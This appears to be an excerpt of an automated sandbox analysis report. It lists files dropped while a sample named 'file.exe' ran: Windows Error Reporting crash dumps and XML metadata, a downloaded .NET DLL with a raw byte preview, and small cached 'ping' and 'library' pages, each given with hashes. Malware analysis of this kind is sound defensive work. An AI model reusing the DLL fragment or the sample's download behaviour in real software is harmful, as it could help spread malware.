Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA78A.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.456263353016033
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjo+8fm8M4JbHvMF1S+q8vcHvqr8MjT9d:uITfq/bgrsqY2JrxKqqr8MX9d
MD5:	1A67183B664D5396AC90BCE7F8D77062
SHA1:	539AE5C0B3475C683B6DC11E36F5F698B3C207EA
SHA-256:	D4EAE1BBDD311AAD058B31DC6F208116082160FCAE65677521D4C994EE53803C
SHA-512:	529AF5C8F610131E95821A51149BD3364B1EA6F7A2F75B54A99CB82B00ED7023A62A6559D6134A792D113E0392AECF563D6712F1991BC98E764C800847C41FF7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA939.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:43:11 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	113082
Entropy (8bit):	2.0681107619964303
Encrypted:	false
SSDEEP:	768:RPUH0JCnn8JQCNQJzt3+RAldV8TYmgp6vAowMYM/b+:dCn8JQC+Jzt3CAbV8TYmgwIowPq+
MD5:	1CD5E8D618E7AF73D8C5A95EB5F7D13A
SHA1:	6829EC55852FA97ECC14D0F2E4BE9E8D38B4EB8E
SHA-256:	DED1A84CA6C8F8FEC0735A0551261878B97A43A22D5B944933BEE53428A761A6
SHA-512:	76AA362C5B37F1A1B0DDBB573C5A5D1236ECA8F5AC0DED3845F7778B453BC361933DDB71446232E055F518EBC7DD193B4250D39D24C9B8D064B8FEADA29F1273
Malicious:	false
Preview:	MDMP....... .........;c............D...............L...........LM..........T.......8...........T............;...}........... ..........."...................................................................U...........B......."......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERACE3.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8402
Entropy (8bit):	3.695268157666598
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCM6iaH6Yq4SUrDOgmf6aSR1XCpBF89baFtsf0Zem:RrlsNiO6p6Y1SUrDOgmfvSTfaFmfQ
MD5:	3DA7A1F94690E182E41D04C2DF514666
SHA1:	9C833398102B6E3F55376419D024BA304147BCD4
SHA-256:	1A2A7860B68F16D8C409A5BB075AFA96413558BD1F835E8F7757650885C9CF39
SHA-512:	BCA4C8B3E6EA67CB845E2184C5A7E5740AC918776DEB52FEBA3F0CA48A029ECB7C8C09FF181DD5DF68FAC95F625B613363432128155D6A26A9F46CD66800E791
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD52.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.454942285825875
Encrypted:	false
SSDEEP:	48:cvIwSD8zsTJgtWI98aWgc8sqYjoX8fm8M4JbKvMFu+q8vcKvqr8MjT9d:uITft/bgrsqYlJmLKzqr8MX9d
MD5:	6B49AB18F657E83D0C96F55D730709B3
SHA1:	10F38FEEAFA26ABED937FA4B65541C817D3FE825
SHA-256:	C6CBAD0266BF9D2E9AD1EE5C7C353068D5AA8BF8C9C1FF3B94322D67C86F06B7
SHA-512:	8136B4377310E824D15537BC2B094D8A002A00B536ED6C972226D7DAA4F6203F7DADD5846D79A2E16987D51A82A1DE850BFDC39580CB69C7538C753DB4CEF518
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719953" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6DA.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:10 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	85942
Entropy (8bit):	2.0420210498869147
Encrypted:	false
SSDEEP:	384:A8tzCP8nwgkuMP8+TWmAaLFAlwUnh885kSXOzKzmTC4JQ:3MP8SuMP8+imAaRAldh885kZWo1Q
MD5:	362B1A24405D371A8E39204A12A3E004
SHA1:	7C58D10FAD08E31F6D99971013950D009EAC0E88
SHA-256:	F4F57A4188D2351CFBEEC4A8E5E5BC5541C169BDED60B6027128200FF84B39DF
SHA-512:	E146D51BEEAC5CDB7BE1ECED9CAFEA957A67E0FA89C7F3BA5D7DC021799BD079F3D0870D9EE0CFC7E00BE8DDADFA68CA3F40E93C879983BC5ABB149081D263EF
Malicious:	false
Preview:	MDMP....... .......b.;c........................x...............H<..........T.......8...........T...........P$..f+..........4........... ....................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC060.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.6940263305917
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCD6IkxMUe6YqcSUEgPTgmf6VSjCpB089byFtsfNmm:RrlsNih6IkxO6YxSUZPTgmfkSoyFmfV
MD5:	57B6D4BCD81AB570F18B284953B6CF0B
SHA1:	E34A33A7EE7DBD6B3E348E74EFA85AE37F95DBB7
SHA-256:	C72E814A8E2F9D466266347CC3496B1DCB6A418701E3515A379CD5A143608B90
SHA-512:	93FC90F6D7017395FDDFEEA31D5BD89F18ECE614D4D513C1D250079DE59EA243E51E027E85DC6D87EDA0E3F12451641926FFEE219EAC9DC0CC1AFBD00EA64CFF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC0CF.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.456809682060808
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoV8fm8M4JbHvMFW+q8vcHvqr8MjT9d:uITfq/bgrsqYPJrPKqqr8MX9d
MD5:	768CEA8AD562E23A8CBFCB6EC4EB04DA
SHA1:	070B615C60CFB6244C556BF135052D4406432464
SHA-256:	FDC954275474D88A1DC5B8B4BBA2DDFFC2DFF5980E28C1A470396A72936C11F1
SHA-512:	294811FD3B8A18EDE649EA66BAB43A896570E372D74ED416747B515B589E77BA718709D14FFA2217CA734AC12F3712443FA3209A4BD724C164A20383245AFB89
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5CE.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:12 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	94696
Entropy (8bit):	2.032305060611396
Encrypted:	false
SSDEEP:	384:LdznPkILkenugjeigkt/G3E/f+TVYAaLFAlwUnh885F6sGnEOysPLbhKrzCAxp:xPkK5sAt/9f+JYAaRAldh885Femr1xp
MD5:	740EDDFA289CB5F8606AE88F5DF6A6A5
SHA1:	66B26C9CD3C9E0807DDFBB4FDE56D2E1B2D63993
SHA-256:	8525B7D1ADB883F1CB5F0D80A8F4135154139DEC4F2B2A678AD6AD39E5A611A5
SHA-512:	65D995B5A732C4550698B638A67FC5F92F8795495BC8ECFDF3B975D7573A992C978A6442AF134A2639D379F2BF95EA1447C1D0259CEEF7D59E753F04C3AB81F0
Malicious:	false
Preview:	MDMP....... .......d.;c........................x...........$...D?..........T.......8...........T...........x$..pM..........d...........P....................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8FC.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.694128664383589
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWC/6I196YqvSUI5vgmf6VSjCpBp89bJFtsfYDm:RrlsNid6I196YCSUI5vgmfkSPJFmfx
MD5:	4327B31DE5EC172DC0D027F94E81A2B9
SHA1:	69AF407D736BB68867E754F0D5A89A3F1C50058B
SHA-256:	C7789CEA73434AE820260AF83A261D4DDB64A4B3F8818676BBB9473C0DB28446
SHA-512:	1B28A03266220BCB1B3647981D05381C8A9CEEF11A7D31568E77EB6A95E0A16133D031898FC8AEC77CDA4CD745E570B1DDD3853CAF58A4A463289A54956C4612
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC989.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.456543489329578
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoT8fm8M4JbHvMFeX+q8vcHvqr8MjT9d:uITfq/bgrsqYpJrzKqqr8MX9d
MD5:	B27A3C89FDF9081809AADEAB819A4AD8
SHA1:	929D26D0531F5D3B336FDD1B3439C4E0D2DB99E5
SHA-256:	596D8F173FC69F12713C334DCAEE3795B433B6193F0E70C95148D34C63580B7B
SHA-512:	25F3A8C4340C50815777838FD7E91B43162DFB55431DA91CEBD58EBA0AFB8BE31EC32B25162BB208B25D0BA044EC8A294DEFB472F1979D7C0DAE816A1129A2AB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2AF.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:16 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	103486
Entropy (8bit):	2.079533641583313
Encrypted:	false
SSDEEP:	768:Ql07PzhFKWt28jQyBSDRAldh88U2ewfBA:QefTKWt9jQyBStAbh88U21pA
MD5:	A69C321636D9B1516AD596BDFF134792
SHA1:	DBB6F7FCE474E00337B74DA044AA8EDBC68F1467
SHA-256:	54299B6E6E01D0D25E444837FCA64D17EEF857699D308AEA61EB3734660273C0
SHA-512:	AFB58937F08616680B927A0763C7BB4C8EF6F73DCC32231037240ACC43A4276E1DE9C0CA524358414C97B675B1DF387E6CCEB5931FA1B504AD66D9BCE6F81A97
Malicious:	false
Preview:	MDMP....... .......h.;c.........................................C..........T.......8...........T...........@*...i...........................................................................................U...........B......\.......GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5FC.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.695746710879512
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWC36IqV6Yq2SUqhcgmf6VSjCpBe89bkFtsfwMm:RrlsNiV6IqV6Y7SUqhcgmfkS+kFmf6
MD5:	E4443C010D0D8E5882AF7F8A6FB54CCC
SHA1:	FF275BDF9BB421E1791778F2BB8043639DE71F34
SHA-256:	F9C6FFAAE05F575B4F13D0BE0AAC9E17C21D4FA0CDC77895524C115DACCAEE2E
SHA-512:	24090CE120BBADC5D23F6406975C1CC1B454BCCA2A4D04EE65B6A01E8D5B994EA4E370C1502DFDA5E2723B9F10F85202271FB47D2EC4F1F65740E509105D1D0F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD699.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.455971551312978
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoh8fm8M4JbHvMF7+q8vcHvqr8MjT9d:uITfq/bgrsqYrJrKKqqr8MX9d
MD5:	B42789C00F6F69BDFD484CAA8E282AD6
SHA1:	10B60B4A44F1D91BE5E4A5E915AF048AF7929B45
SHA-256:	C1942FBCE24A3B4EC0B65B1DCBBAE3AA15E2272F05A4978D21A5288703EE0DF9
SHA-512:	64ABE75E2677EE5396EF71D67843492B87A2D40E76861296E7FF0467E477F86FBF2DABE88A7D0C4183829FA66B9F7D62AC9F5B77E814FF79BF757B9CDCF83F81
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\library[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\ping[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
